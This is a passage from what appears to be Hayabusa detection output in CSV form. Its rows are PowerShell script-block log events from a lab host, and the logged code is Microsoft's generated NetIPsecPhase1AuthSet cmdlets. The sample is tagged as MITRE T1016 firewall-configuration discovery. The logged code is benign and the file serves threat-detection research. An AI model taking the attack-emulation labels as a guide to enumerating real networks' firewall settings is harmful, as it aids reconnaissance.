[CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.942 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetIPsecPhase1AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.942 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = 